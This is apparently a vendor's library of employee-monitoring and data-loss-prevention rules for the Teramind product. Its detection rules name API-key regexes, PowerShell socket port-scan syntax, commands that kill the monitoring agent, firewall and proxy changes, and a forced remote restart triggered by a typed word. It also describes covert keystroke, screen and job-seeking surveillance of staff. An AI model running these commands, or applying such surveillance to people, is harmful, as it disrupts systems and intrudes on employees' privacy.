This policy governs how employees interact with AI tools, both approved and unapproved. Its rules span the full spectrum of AI-related risk: shadow AI desktop apps, browser-based AI portals, autonomous agents, credential exposure, and data sovereignty. Together they give security teams visibility and control over an attack surface that most legacy policies do not address.

While many security protocols focus on web traffic, standalone desktop AI models often run locally and can bypass traditional browser-based proxy filters. This rule creates a gatekeeper for these applications to ensure that all AI processing occurs only through approved, monitored channels rather than unmanaged desktop software.

This rule identifies standalone desktop AI apps such as claude.exe, perplexity.exe, chatgpt.exe, ollama.exe, lm studio.exe, and dozens of others, which can circumvent standard web-based security layers. It utilizes the Application Name criterion to detect these specific binaries the moment they are executed on the user's machine. By identifying these "Shadow AI" applications, the system can prevent unmanaged tools from processing sensitive company data. The Warn action alerts the user immediately that they are not permitted to use that specific software, prompting them to switch to authorized web portals.

Identifying direct interaction with AI assistants often requires visual context that standard logs might miss, especially when AI features are embedded within other platforms.

This rule identifies when a Google Gemini prompt interface is actively visible on a user's screen, indicating direct engagement with the assistant. It utilizes Teramind's patented OCR technology to scan every pixel of the employee's screen in real-time for specific phrases such as "Enter a prompt for Gemini" or "Ask Gemini 3". Upon detection, the rule triggers a Notify action to designated administrators, providing instant visibility into real-time AI engagement that traditional text logs might otherwise overlook.

The market is now seeing the rise of AI-centric browsers that prioritize assistant sidebars over traditional security perimeters. This rule identifies and warns users against using these unrecognized tools to ensure all web activity remains within the organization's vetted and secured browser ecosystem.

This rule identifies and warns users against using unrecognized AI-centric browsers that have not been vetted by IT security for safe corporate use. It uses an Application Name criterion to detect binaries such as fellou.exe, comet.exe, neon.exe, monica.exe, and similar AI-first browsers. Because these tools may handle user sessions or data scraping differently than standard browsers, they represent a high-risk "Shadow AI" channel. The Warn action displays an urgent HTML message informing the user they are using an unauthorized browser, guiding them back to approved software.

Developers frequently use AI agents through the command-line interface (CLI), such as Claude Code, which handle large codebases entirely out of view of browser monitors. This rule ensures that terminal-based AI usage is transparently tracked to prevent the leakage of proprietary source code or infrastructure keys.

This rule tracks CLI AI agents operating in a channel normally invisible to browser-level monitoring. It triggers when the Application Name criterion detects a system shell (such as cmd.exe or windowsterminal.exe) and the Application Caption (window title) contains the keyword claude. This specific logic identifies the moment a developer initiates an AI-assisted session within their terminal environment. The Notify action ensures the security team receives an internal notification, providing an audit trail for all commands executed by the AI agent.

Autonomous AI agents can perform filesystem operations and background tasks that may circumvent standard security perimeters if left unmonitored.

This rule surfaces unauthorized autonomous AI tool usage by monitoring for active OpenClaw agent processes on endpoints. It utilizes a File Operation criterion to detect Write operations performed by the node.exe application targeting specific session directories, such as \.openclaw\agents\main\sessions\. The rule covers both Windows and Unix path formats. If such activity is detected, a Warn action informs the user that unauthorized activity has been identified, ensuring that agents do not perform background tasks without proper oversight.

Establishing a transparent audit trail of autonomous agent actions is critical for identifying unauthorized use of AI automation tools on endpoints.

This rule flags when OpenClaw AI agent commands are executed via Node.js on the endpoint, creating a record of autonomous actions. It uses the Application Name criterion that monitors for the node process paired with the Application Args (command-line arguments) criterion containing openclaw. When an execution is detected, a Warn action is triggered to notify the user and audit the agent's behavior to ensure it does not bypass security controls.

AI agents require consistent, secured configurations to prevent unauthorized shifts in their operational scope or security posture.

This rule monitors for unauthorized writes to the OpenClaw configuration file to ensure that AI agent settings are not tampered with. By flagging modifications to the openclaw.json file, the system prevents changes that could weaken security policies or expand agent capabilities beyond their intended scope. The rule utilizes the File Operation criterion to specifically detect Write operations targeting the configuration path on both Windows (\.openclaw\openclaw.json) and Unix (/.openclaw/openclaw.json) systems. Upon detection, a Warn action is triggered to immediately notify the user that a configuration change has been identified.

AI portals offer direct document analysis features that represent a major vector for data exfiltration. This rule enforces a strict boundary by blocking the upload of documents to recognized AI domains, ensuring that sensitive internal files maintain their data sovereignty and are not used for model training.

This rule stops internal documents from being uploaded to major AI portals to maintain data sovereignty and prevent the loss of proprietary information. It relies on File Operation (Upload) and Upload URL criteria to target uploads to a comprehensive list of known AI domains, including chatgpt, claude, copilot, grok, gemini, perplexity, deepseek, mistral.ai, huggingface.co, midjourney.com, runwayml.com, and over 40 others. By filtering based on the destination URL, the system identifies when a user is attempting to move local files into an unmanaged AI portal. The Block action prevents the transfer from completing and displays an HTML message informing the user of the data protection restriction.

Users often paste sensitive PII, PHI, or financial data into AI tools to reformat or summarize it, creating significant compliance risks. This rule inspects the clipboard to ensure that regulated data like credit card numbers is never transferred to a public AI interface.

This Content Sharing rule inspects the clipboard in real-time and intercepts when regulated data is pasted into AI portals. It utilizes built-in Predefined Classified Data (Financial Data) criteria in Strict mode to detect exactly formatted credit card numbers the moment they are copied. By checking if the destination URL belongs to a known AI domain, including claude.ai, chatgpt.com, gemini.google.com, grok.com, deepseek, and 80+ other platforms, the system shows a warning message to the user via the Warn action and simultaneously alerts an administrator to the specific data violation via the Notify action.

One of the most common causes of data breaches is the accidental inclusion of hardcoded API keys in prompts sent to AI tools for debugging. This rule proactively monitors for these patterns to prevent credentials from being shared with public LLMs, which could lead to unauthorized server access.

This rule monitors keystrokes in coding applications and AI tools to prevent credential theft caused by pasting API keys into AI tools for debugging or code generation. It uses a Matches regex condition to identify exact patterns for major provider keys, including OpenAI (sk-[a-zA-Z0-9]{48}), Anthropic (sk-ant-api03-...), Google AI (AIza...), Groq (gsk_...), xAI (xai-...), Perplexity (pplx-...), Hugging Face (hf_...), Replicate (r8_...), and NVIDIA (nvapi-...), typed into a broad list of high-risk applications like cursor.exe, chatgpt.exe, windsurf.exe, or perplexity.exe. The Warn action ensures the user is immediately alerted to their mistake while security is notified of the potential leak.

In the modern enterprise, maintaining a clear boundary between personal AI usage and corporate-approved environments is critical for ensuring security. Without such distinctions, sensitive corporate data can easily leak into unmanaged personal accounts, circumventing organizational security perimeters and compliance mandates.

This rule is designed to identify and block unauthorized Claude AI accounts, ensuring that all employee interactions remain strictly within the organization's approved and monitored instance. The rule functions by monitoring Webpages activity for API resource requests directed at the claude.ai/api/organizations/ path. By utilizing an Except condition to whitelist your specific corporate tenant ID, the system blocks all other organization-level requests, effectively preventing access to personal or unmanaged Claude workspaces. When an unauthorized access attempt is detected, the Block action is triggered, presenting the user with a message directing them to use the authorized corporate account.

Note: When deploying this rule, replace the Except field under the Webpage URL criteria with your unique organization or workspace ID, for example: 93a2013d-4b13-b130-f3a335a8240f. You can also use a Shared List to whitelist multiple workspaces.

This policy provides a broad library of compliance-focused rules covering data handling, system integrity, privileged actions, and behavioral indicators. Many rules align with MITRE ATT&CK techniques and internal governance requirements. They serve as the operational backbone for regulatory compliance frameworks such as HIPAA, PCI-DSS, and SOX.

Attempts to browse or tamper with the Teramind Agent's own installation directory can be a precursor to tampering with or disabling the monitoring system itself, a key step in covering malicious activity.

This rule monitors any file system or registry interaction with the Teramind Agent installation paths (C:\ProgramData\{4CEC2908...} and C:\ProgramData\Teramind Agent) performed via Windows Explorer (explorer.exe). It also monitors for command-line access targeting the same paths and Teramind-related registry keys under SYSTEM\CurrentControlSet\Services\. Any access, write, rename, delete, or folder operation in these locations triggers a Warn action.

Clipboard monitoring provides a direct window into what information employees are actively moving between applications. Intercepting sensitive keywords during paste operations prevents unintentional or deliberate sharing of confidential content.

This Content Sharing rule triggers when text containing terms like "sensitive", "word", or "confidential" is pasted from the clipboard into any application except Notepad. It uses both text and binary content inspection criteria to catch these keywords in all data types. The Warn action alerts the user that they are distributing potentially sensitive information.

Elevated PowerShell execution is a hallmark of both legitimate administrative work and many attack chains. Detecting and logging its use, particularly with elevated privileges, is essential for distinguishing authorized from unauthorized system changes.

This rule triggers when powershell.exe is launched with elevated (administrator) privileges, provided the window title does not contain "teams" (to reduce false positives from Microsoft Teams). It uses the Application Name and Elevated criteria in combination. The Warn action notifies the user and creates a log entry for auditors.

After-hours logins are a significant indicator of insider threat activity or compromised credentials. Detecting fresh logins (not screen unlocks) during non-business hours enables rapid response before damage occurs.

This Agent-Based Schedule rule fires when a user logs into Windows for the first time (not a screen unlock) between midnight and 10:00 AM or between 6:00 PM and midnight. The Notify action sends an alert to the incident response team email addresses configured in the rule, providing immediate situational awareness.

Port scanning tools are almost exclusively used for reconnaissance, either legitimately by authorized network administrators or maliciously by attackers mapping the internal network. Any unauthorized usage should be flagged immediately.

This rule detects the execution of nmap.exe or any command-line invocation of the PowerShell TCP socket syntax New-Object System.Net.Sockets.TCPClient, which is a common technique for homemade port scanning in environments where nmap is blocked. The Warn action is triggered to alert the user and create an audit record.

Documents marked as classified or top-secret require a heightened level of scrutiny. Detecting when such documents appear on screen, regardless of their origin, provides visibility that file-based monitoring alone cannot.

This rule uses OCR to scan the visible screen in real-time for classification labels: "top secret", "classified", "top-secret", and "privileged". The rule is scheduled to operate during business hours (04:10–16:05) and triggers a Notify action to the designated administrator when such text is detected on screen.

Printing a resume or cover letter from a corporate device during business hours is a meaningful behavioral signal that an employee may be actively job-seeking and represents a potential flight risk indicator.

This rule monitors print jobs and triggers when a document's name contains "resume" or "cover letter". Using Teramind's Printed Documents monitoring capability, it captures this event and sends a Notify action to the assigned administrator. The rule runs 24/7 to capture after-hours printing as well.

Modifications to the Windows Startup folder are a classic persistence technique. While sometimes legitimate, this action should always be logged and reviewed, particularly on servers and endpoints with elevated access.

This rule triggers on Write operations to either the system-wide (C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp) or user-specific (\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup) startup folders, performed via Explorer. It also detects when the user navigates to the Startup folder in Windows Explorer (via window title). The Warn action fires immediately upon detection.

Single card copies may occur during normal payment processing, but bulk copying of multiple credit card numbers simultaneously is a strong indicator of data harvesting or skimming activity.

This rule uses the Financial Content (Credit Card Number) classifier in Strict mode with a threshold of 2 or more card numbers in a single clipboard event. It monitors all applications and webpages for this pattern. Upon detection, a Warn action notifies the user that they have copied multiple credit card numbers.

Monitoring for inappropriate content on corporate devices is an important compliance and HR requirement. However, broad keyword matching often creates false positives in sensitive professional contexts like legal or social work environments.

This rule triggers when the word "naked" is typed in keystrokes, using a regex that deliberately excludes instances where the word is followed by terms like victim, abuse, assault, report, case, child, or investigation. This prevents false positives during legitimate discussions. When the term is detected in a non-exempted context, the rule executes a remote Command action to immediately restart the machine (shutdown /r /t 0).

Opening network sharing dialogs or running share-configuration commands are activities that should be audited, particularly on sensitive servers, as they can expose internal resources to unauthorized network access.

This rule monitors for the "Network access" or "Advanced Sharing" dialog titles in any application window. It also detects command-line usage of net share, New-SmbShare, and Get-SmbShare PowerShell cmdlets. A Warn action is triggered to create an audit log of the sharing configuration activity.

Modifications to browser proxy and security zone settings can be used to bypass web filters, inject traffic, or enable access to blocked websites. This makes detecting such changes essential for maintaining network security policy integrity.

This rule fires when iexplore.exe (Internet Explorer or IE-based control panels) is opened with the window title "Internet Options". The Warn action creates a record of the attempt to modify internet security settings.

User account creation in Active Directory is a high-value action that must be logged for both security and compliance purposes. Unauthorized account creation is a common persistence technique used by threat actors after gaining initial access.

This rule detects Active Directory user creation via two methods: the MMC snap-in (when mmc.exe shows the "New Object - User" dialog) and the command line (via New-ADUser or net user /add). The Warn action fires upon detection to create an immediate audit record.

P2P file-sharing applications represent a significant compliance and security risk: they can be used to exfiltrate data, introduce malware, and expose the organization to copyright liability.

This rule uses a Shared List (P2P application list) matched against the Application Name to detect known P2P clients at launch. The Warn action alerts the user and logs the event, providing a first-response deterrent.

Querying or modifying system time can serve as both a reconnaissance activity and a defensive technique, as attackers sometimes manipulate timestamps to confuse logging systems or bypass time-based authentication.

This rule monitors for system time discovery commands (systeminfo, net config workstation, date /t, Get-Date) executed from the command line, as well as UI access to the "Date and Time", "Date and Time Settings", and "Time Zone Settings" dialog windows. The Warn action fires to log and surface this activity.

Workplace violence is a serious concern and early detection through communication monitoring can prevent harm. This rule surfaces threatening language typed on corporate devices.

This rule monitors keystrokes for a curated list of terms associated with threats of violence, including "gun", "bomb", "pipe bomb", "shoot up", "assassination", "hostage", "murder", "blackmail", and others. When detected, a Notify action alerts the designated administrator so that HR or security can intervene promptly.

Windows event logs are the primary forensic artifact for incident investigation. Copying or exporting them outside normal channels may indicate an attacker trying to erase evidence of their actions, or an insider attempting to steal audit data.

This rule fires when .evtx files from C:\Windows\System32\winevt\Logs are copied via Explorer, when Event Viewer (eventvwr.exe) is launched, or when command-line copy operations targeting the event log path are detected. The Warn action creates an immediate audit record of the activity.

Downloads from third-party cloud storage services may represent data being exfiltrated to personal accounts, or malicious files being staged for execution. Monitoring this activity provides early warning across common platforms.

This rule fires once per day when a file download is detected from URLs belonging to Sync.com, pCloud, WeTransfer, Dropbox, Box, OneDrive, iCloud, Imgur, Onehub, or mega.nz. SVG files are excluded to reduce noise from web assets. The Warn action notifies the user and creates an audit entry.

Screenshots of payroll data or compensation information are a targeted form of internal data theft that standard file monitoring cannot detect, since the data never leaves as a file.

This rule triggers when the Snipping Tool (snippingtool.exe) is active while OCR detects the word "compensation" on screen. The combination of the screenshot tool and sensitive on-screen content creates a high-confidence signal that payroll data is being captured. An alert (with no additional action configured by default) is generated for review.

Extended use of non-work applications during business hours, particularly simple utilities like Calculator, is a minor productivity concern that can accumulate significantly across a workforce. This rule enforces time-based usage limits.

This rule monitors focused time in win32calc.exe or calculatorapp.exe and triggers when the user has been continuously focused on the application for 5 minutes (300 seconds) or more. The Warn action displays a message prompting the user to return to work.

Software installations on servers can introduce vulnerabilities, violate licensing agreements, or be used to plant malicious tools. Every new installation should be logged and authorized.

This rule fires when msiexec (the Windows Installer engine) is detected alongside Write operations to C:\Program Files or C:\Program Files (x86), indicating a software package is being installed. The Warn action creates an immediate audit entry for IT review.

Outbound emails with attachments sent to external domains are the most common data exfiltration channel. This rule catches all such emails at the moment of send to enable review before data leaves the organization.

This rule monitors outgoing email activity and triggers once per day when an email with an attachment is sent to an address that does not belong to @mydomain.com. The Warn action fires and logs the event, and the daily aggregation reduces alert fatigue while ensuring coverage.

Password resets are a powerful action that can be weaponized: attackers who gain access to an admin account may reset other users' passwords to lock them out or take over their sessions.

This rule detects password resets performed via the MMC "Reset Password" dialog or via command-line tools such as Set-ADAccountPassword and net user. The Warn action fires on detection to create an audit record for privileged account operations.

Downloads from corporate web applications like SharePoint, OneDrive, and Azure represent a common path for insiders to bulk-collect company data before departing. Monitoring these specific sources provides targeted coverage of the highest-risk download channels.

This rule fires when files are downloaded from URLs containing "onedrive", "sharepoint", or "azure". The Warn action is triggered to log and surface the download event for security review.

Direct file access to C:\Windows\ and its subdirectories by standard users is unusual and potentially indicative of reconnaissance, DLL injection preparation, or system tampering.

This rule monitors for File Access operations targeting any path under C:\Windows\ on all drives. The Warn action fires to log the event and alert the user, creating an audit record for security review.

The Windows Registry is a critical configuration store. Direct editing of registry values, whether through the graphical Registry Editor or via command line, can be used to disable security tools, establish persistence, or alter system behavior in malicious ways.

This rule detects registry edits through two methods: the regedit.exe GUI (when the "Edit String" dialog title is visible) and command-line usage of reg add, reg restore, Set-ItemProperty, and New-ItemProperty. A Warn action fires upon detection.

Large-volume uploads to personal cloud storage are a clear indicator of bulk data exfiltration, particularly common among departing employees who may attempt to take entire project folders before their last day.

This rule triggers when a file upload of more than 500 MB (500,000,000 bytes) is detected to box.com or dropbox.com. The Upload URL and Upload Size criteria work in combination to ensure only genuinely large transfers trigger the alert. The Warn action fires to surface the event.

The Snipping Tool is a common, low-friction method for capturing screen data, including financial information displayed in business applications, without creating a file that would trigger DLP rules.

This rule fires when the Snipping Tool (snippingtool.exe) is active while OCR detects a credit card number on screen using a Shared List of credit card regex patterns. The combination provides high confidence that financial data is being captured as an image. An alert is generated for security review.

TOR browser usage on corporate devices is a significant risk indicator: it may be used to communicate with threat actors, browse illegal marketplaces, or access data leak sites.

This rule monitors web page visits and fires when any URL containing the .onion TLD is accessed, indicating TOR browser activity. The Warn action fires to alert the user and log the event.

Attempts to terminate the Teramind monitoring agent are an unambiguous indicator of malicious intent or policy circumvention. This rule ensures any such attempt is immediately surfaced.

This rule monitors for the launch of process management tools (taskmgr.exe, processhacker.exe, procexp.exe) or command-line arguments containing taskkill, Stop-Process, or the names of core Teramind processes (mtm.exe, mtm64.exe, svc.exe, dmw.exe, tmagent.exe, tmagentsvc.exe, tsvchst). The Warn action fires immediately to alert the security team.

USB devices are a classic and reliable exfiltration channel. Files written to external drives, or copied from external drives, represent a direct physical data transfer that bypasses all network controls.

This rule triggers on any file Access or Write operation targeting %EXTERNALDRIVES%, or on Copy operations originating from an external drive. The Warn action fires to create an audit record of the USB interaction (MITRE ATT&CK ID: T1052.001).

Clearing browser history can be a normal user action, but when combined with other suspicious behaviors, it often represents an attempt to remove evidence of policy-violating or malicious web activity.

This rule detects history clearing through two paths: a file Delete operation on the Chrome user data path (\AppData\Local\Google\Chrome\User Data), or the Chrome settings URL chrome://settings/clearBrowserData being visible in a window title. It also detects command-line deletions of that directory. The Warn action fires to log the event.

Any copy of a credit card number from any application is a compliance-relevant event under PCI-DSS. This broad rule provides a daily audit log of all such clipboard operations, regardless of where the data was pasted.

This rule uses the Financial Content (Credit Card Number) classifier in Loose detection mode (to capture partial or near-match card formats) with a count of 1 or more, triggered on clipboard operations from any application. The daily period aggregation prevents alert fatigue. The Warn action notifies the user.

Credentials stored or transferred via Notepad are a classic operational security failure: developers or administrators often temporarily paste usernames and passwords into plain text files.

This rule fires when clipboard content containing the words "Username" or "Password" is pasted into notepad.exe. The Warn action triggers immediately to discourage insecure credential handling and create an audit record.

Certain drives may be designated as restricted in the organization's data classification policy. Any access to these drives from unauthorized users represents a serious policy violation.

This rule monitors all file operations (Any) targeting the G: drive (which should be replaced with the actual restricted drive letter in your environment). The Block action immediately prevents access and displays an "Access Denied" HTML message to the user.

Batch file and shell command execution through cmd.exe is a foundational technique used in both administration and attacks. Detecting command-line invocations with .exe or .bat arguments enables broad visibility into command execution activity.

This rule fires when a command-line process is detected with arguments containing .exe, .bat, or a /c switch (excluding URLs containing //c). This covers both direct batch file execution and the classic cmd /c syntax used for one-liner command execution. The Warn action fires to log the activity.

When files are copied from designated sensitive directories, whether a local protected folder or a network share, and pasted elsewhere, the destination becomes unknown. This rule tracks the source of the copy to flag when sensitive content is being relocated.

This rule monitors Copy operations where the source path includes a known sensitive directory (e.g., C:\Users\j.jet\Desktop\Test Zone\sensitive) or where files are copied from network shares (%ALLSHARES%). The Warn action fires with a message to the user when this pattern is detected.

Accessing the registry of a remote machine is an advanced administrative operation that can also be a precursor to lateral movement, persistence installation, or configuration tampering on other endpoints.

This rule detects remote registry access via the regedit.exe "Select Computer" dialog, or via the command-line reg query command targeting a remote host. The Warn action fires to create an audit log of the remote registry connection attempt.

Importing a .reg file overwrites existing registry values and can silently install malicious configurations, persistence mechanisms, or security bypasses.

This rule detects registry imports through the reg import command, through the Registry Editor's "Import Registry File" dialog, or through Windows Explorer opening a .reg file. The Warn action fires immediately to alert the user and create an audit record.

Password-protected archives are a common technique for concealing file contents and bypassing content inspection at the network perimeter. While sometimes legitimate, this action warrants logging, particularly around sensitive data repositories.

This rule detects password-protected archive creation in WinRAR (WinRAR.exe) via the "Enter password" or "Archive name and parameters" dialogs, in 7-Zip (7zG.exe) via the "Add to Archive" dialog, and via command-line rar.exe -P or 7z.exe -p invocations. The rule aggregates once per day. The Warn action fires upon detection.

Bulk printing is a classical pre-departure exfiltration method. Documents that are too large to email or copy quickly can be physically removed if printed, particularly in regulated industries where hard copies carry significant value.

This rule triggers when a print job of 60 or more pages is submitted. It uses the Print size criterion to detect bulk print events. An alert is generated for security review with no additional action configured by default.

Large-scale file copy operations from user directories or network shares are a common indicator of data staging, aggregating files in preparation for exfiltration. This rule provides visibility into significant copy operations.

This rule fires when Copy operations are detected from user directories (under C:\Users) to any drive (excluding Windows system folders), or from network shares (%ALLSHARES%). It also detects command-line equivalents including robocopy, copy-item, cp, and xcopy. The Warn action fires and triggers a 60-second pre/post screen recording window to capture the user's actions in context.

Saving email attachments directly into a cloud-synced folder is an indirect exfiltration method that automatically transfers data to a personal cloud storage account without triggering direct upload alerts.

This rule fires when Outlook (outlook.exe) writes a file to a cloud client sync destination, or when a file is downloaded from Gmail (mail.google.com) that is not a known analytics file (excluding logstreamz and jserror). The Warn action fires to alert the user that saving email attachments to sync folders is restricted.

Third-party remote access tools provide persistent, encrypted tunnels into endpoints that bypass standard network monitoring. While some are IT-approved, unapproved tools are a significant security risk.

This rule detects the launch of known remote access binaries: rms.exe, teamviewer.exe, and anydesk.exe. The Warn action fires immediately upon process launch to alert the security team (MITRE ATT&CK ID: T1219).

Specific high-value documents, such as client data spreadsheets, may need enhanced monitoring regardless of the user accessing them. URL-based monitoring provides precise protection at the document level.

This rule monitors for visits to two specific Google Sheets URLs containing key client data. When either URL is loaded in a browser, the Warn action fires with a reminder that the content is sensitive and should not be copied.

Credit card numbers displayed in business applications can be captured visually without triggering any file or clipboard event. OCR-based detection provides a last line of defense against screen-based financial data theft.

This rule uses OCR to scan the visible screen for patterns matching Mastercard, Visa, American Express, and Discover card number formats using regex. When a credit card number is detected on screen, a Notify action alerts the designated administrator for immediate follow-up.

Much like Chrome history clearing, removing Internet Explorer/Edge browsing history can be an attempt to erase evidence of unauthorized web activity. IE-specific detection ensures coverage of legacy browsers still present in many enterprise environments.

This rule detects IE history clearing through the "Delete Browsing History" dialog in iexplore.exe or via the command-line RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess invocation. The Warn action fires to log the event.

Unauthorized VPN or tunneling tools can be used to bypass corporate web filters, obscure network traffic, or establish covert communication channels, representing a direct risk to network visibility and data loss prevention controls.

This rule detects the launch of openvpn or wireguard processes by application name. The Warn action fires immediately to alert the security team that an unapproved tunneling tool is in use.

Exporting registry hives creates portable copies of system configurations that can be analyzed offline, shared externally, or used to reconstruct environments without authorization. This activity should always be logged.

This rule fires when reg export is executed from the command line or when the "Export Registry File" dialog is opened in regedit.exe or Explorer. The Warn action fires to create an audit record.

Documents with sensitive classification labels in their filename represent content that may be subject to special handling requirements. Printing them without authorization creates uncontrolled physical copies.

This rule monitors print jobs where the document name contains "sensitive doc" or "confidential". The Warn action fires upon detection. (Update the document name filters to match your organization's naming conventions.)

Downloading or executing the Teramind agent removal tool is an unambiguous indicator that a user is attempting to disable monitoring, a serious policy violation requiring immediate intervention.

This rule fires when a file download from a URL containing "teramind-remover" is detected, when a file is renamed to contain "teramind-remover", or when an application with that name is launched. The Block action immediately prevents the operation from completing.

Sharing proprietary source code with public AI tools, even for benign purposes like debugging, may expose intellectual property or reveal architectural details to third-party systems without organizational consent.

This rule triggers once per day when the keyword "code" is typed in keystrokes while the active browser tab is on chatgpt.com. The Notify action sends an alert to the configured administrator, providing visibility into code sharing behavior with AI tools.

Modifying or disabling the Windows Firewall removes a critical network defense layer and is a common technique used by attackers to enable C2 communication or prevent security tool updates.

This rule detects firewall modifications via multiple methods: command-line operations using netsh advfirewall commands (set, add rule, delete rule), New-NetFirewallRule, Remove-NetFirewallRule, and related PowerShell cmdlets. It also detects UI access to the Windows Defender Firewall control panel. The Warn action fires on detection (MITRE ATT&CK ID: T1562.004).

Outbound emails whose subject lines contain classification terms like "sensitive", "confidential", or "classified", sent to external recipients, represent a potential data disclosure risk that should be reviewed.

This rule fires when an outgoing email's subject contains those terms and the recipient domain is not @mycompany.com. The Warn action fires to surface the event. (Update the domain exclusion to match your organization.)

Personally identifiable information, including Social Security Numbers, phone numbers, and email addresses, sent via email to external parties represents a potential HIPAA, GDPR, or CCPA violation.

This rule uses the Personal Content classifier to detect SSN, phone number, or email address data in outgoing emails sent to addresses outside @teramind.co, or in outgoing emails with attachments. The Notify action alerts the designated administrator when any of these PII types are detected in an outbound email context.

Employees actively searching for new employment are a flight risk and may attempt to exfiltrate data before departure. Detecting job-seeking keywords in keystrokes provides early warning for HR and security teams.

This rule monitors keystrokes for job-seeking terms, including "new job", "recruiter", "full time", "career", "job hunt", and "salary", and aggregates detections daily. The Notify action sends a report to the configured administrator.

This is an additional copy of the after-hours login rule, with slightly different recipients. It triggers on logins between midnight and 10:00 AM or between 6:00 PM and midnight (excluding screen unlocks), sending notifications to both [email protected] and a secondary email address.

RDP connections to sensitive servers from applications other than the authorized mstsc.exe client may indicate that an attacker or unauthorized tool is establishing a remote session.

This rule monitors network connections to specific sensitive server IPs (e.g., 192.168.1.1 or 172.16.1.1) on port 3389 (RDP), where the connecting application is not mstsc.exe. The Warn action fires to alert the security team of the unauthorized RDP connection attempt.

VPN configuration changes can create unauthorized network tunnels, bypass content filtering, or expose internal resources. All such changes should be logged and reviewed.

This rule detects VPN configuration via the Control Panel Network Connections dialog, the "Connect to a Workplace" wizard, or command-line tools like rasphone, rasdial, Add-VpnConnection, and Set-VpnConnection. The Warn action fires to create an audit record.

Any file system interaction with an external drive that hasn't been explicitly authorized represents a potential data exfiltration or malware introduction vector.

This rule fires on any file operation (Any) targeting %EXTERNALDRIVES%. The Warn action fires to notify the user and create an audit record of the USB connection and file activity.

Proxy and LAN settings control how a machine routes its traffic. Unauthorized changes can redirect traffic through attacker-controlled infrastructure, bypass DLP controls, or enable man-in-the-middle attacks.

This rule detects proxy configuration changes through: the Control Panel Network Connections page, the rundll32.exe Internet Properties or LAN Settings dialogs, and command-line operations using netsh winhttp set proxy, set HTTP_PROXY=, set HTTPS_PROXY=, and related registry commands. The Warn action fires on detection.

Enter-PSSession and Invoke-Command are the primary PowerShell remoting cmdlets. Their use is a significant event that may indicate lateral movement, remote configuration changes, or unauthorized administration.

This rule detects command-line execution of Enter-PSSession or Invoke-Command. The Warn action fires to create an audit record of the remote PowerShell activity.

This policy focuses on identifying behavioral patterns and technical actions that are typical of insider threat scenarios, covering both malicious insiders and negligent employees. Rules range from direct data exfiltration attempts to behavioral signals like accessing streaming sites during work hours.

RDP clipboard-based file transfers are frequently overlooked but represent a simple, effective mechanism for moving files between a remote and local session without triggering standard file transfer alerts.

This rule fires when a Copy operation is detected that is flagged as an RDP transfer (rdpTransfer = true). The Block action immediately prevents the file transfer from completing.

Verifying whether employees are physically present in the office can be accomplished by checking whether their endpoint has a known internal IP address assigned to the office network.

This rule uses a Network criterion to check whether the user's local IP address matches the office network IP (e.g., 1.1.1.1/32). When the IP matches, it confirms office presence. The Lock User action (with zero severity) can be adapted to trigger other workflows or reports.

Projects under a code name may contain information so sensitive that any visible reference on screen, even in a meeting or document, warrants immediate notification to security leadership.

This rule uses OCR to monitor all on-screen content for the exact phrase "Project Icarus" (replace with your actual project code name). Upon detection, a Notify action with maximum severity (100) alerts the designated administrator immediately.

Certain applications may be prohibited on corporate endpoints due to security vulnerabilities, compliance requirements, or license restrictions. This rule enforces a hard block on Java applications outside of approved exceptions.

This rule blocks any process matching java.exe unless the title contains "Java" or the application is an approved exception (zoom.exe or soffice.bin). The Block action fires immediately with a message informing the user that Java applications are not permitted.

Streaming video sites consume significant bandwidth and represent unproductive use of work time. This rule provides both a user-facing warning and a manager notification when corporate devices are used to access them.

This rule monitors webpage visits to a broad list of streaming platforms including Netflix, Disney+, Hulu, HBO Max, Amazon Prime Video, Crunchyroll, Dailymotion, and others. When any of these sites is loaded (as a full Webpage request), the Warn action shows the user a message and the Notify action alerts the assigned manager.

Large downloads from Google Drive, particularly from shared corporate drives, may represent bulk data collection by an insider preparing to leave or exfiltrate company assets.

This rule fires when a file download is detected from drive.google.com, drive.usercontent.google.com, or drive-data-export.usercontent.google.com. The Notify action alerts the administrator when this occurs. The rule has a high severity rating (75) to reflect the elevated risk.

TOR browser usage on corporate devices is a serious risk indicator and almost always violates acceptable use policies. The anonymization features make it a preferred tool for employees attempting to bypass monitoring.

This rule detects tor.exe when it is not monitor.exe or firefox.exe, and also catches the "Connect to Tor" dialog title. The Warn action displays an HTML message to the user informing them that TOR Browser is prohibited.

This comprehensive DLP rule covers all major vectors through which credit card data could leave the organization: file operations, outgoing email attachments, clipboard use, and instant messages.

This rule uses the Financial Content (Credit Card Number) classifier in Strict mode and fires when credit card data is detected in any of these activities: file Copy or Upload operations, outgoing email attachments sent to external addresses (not teramind.co), clipboard operations in Excel or Notepad, or outgoing instant messages. The Notify action alerts the assigned security contact with maximum severity (100).

Renaming downloaded files can be a technique for obfuscating the identity of malicious files or evading filename-based DLP rules. Monitoring renames in download directories provides early warning.

This rule fires when a Rename operation is detected on files within downloads\client paths. The Notify action alerts the administrator with high severity (75).

Enforcing strict login windows ensures that corporate systems are only accessed during authorized periods. This rule goes beyond detection: it actively blocks logins that occur outside permitted hours.

This rule fires when a user logs in (including screen unlocks, screenUnlock = true) during business hours outside the permitted window (5:40 AM – 7:20 PM in the configured example). The Block action prevents the session from continuing with a message that login is not allowed during off-hours.

This example rule demonstrates Teramind's full content inspection capabilities for file operations, combining text content, binary content, file origin, file properties, and financial data detection in a single rule.

This rule fires when a file involved in a Write, Access, Delete, Copy, or Upload operation contains any of: specific sensitive text, file metadata from a designated network origin, custom file properties, or credit card numbers (Loose mode). The Block action prevents the operation, a Notify action alerts the assigned contact, and a 10-minute pre/post screen recording is captured for forensic review.

Certain directories contain classified or restricted files that should only be accessed by authorized personnel. This rule monitors a specific sensitive folder and alerts on any access or modification.

This rule fires when Access or Write operations are detected on files within the designated sensitive folder (C:\path\to\sensitive folder), or when files are Copied from that folder. Update the path to match your organization's sensitive directory. The Warn action fires with a message to the user.

Toxic workplace communications, including threats, intimidation, and statements about leaking company information to competitors, are HR and security risks that warrant immediate escalation.

This rule monitors keystrokes for specific phrases indicative of workplace toxicity, including "throat punch", "make sure he pays for this", "go to the competition with everything", and "going to explode". The Notify action with high severity (75) alerts the administrator immediately.

Downloading applications like TOR or privacy-focused browsers directly to corporate machines represents a deliberate attempt to install unauthorized or monitoring-evasion tools.

This rule fires when a file download is detected where the filename contains "tor" or "brave". The Block action prevents the download from completing and displays an HTML message to the user.

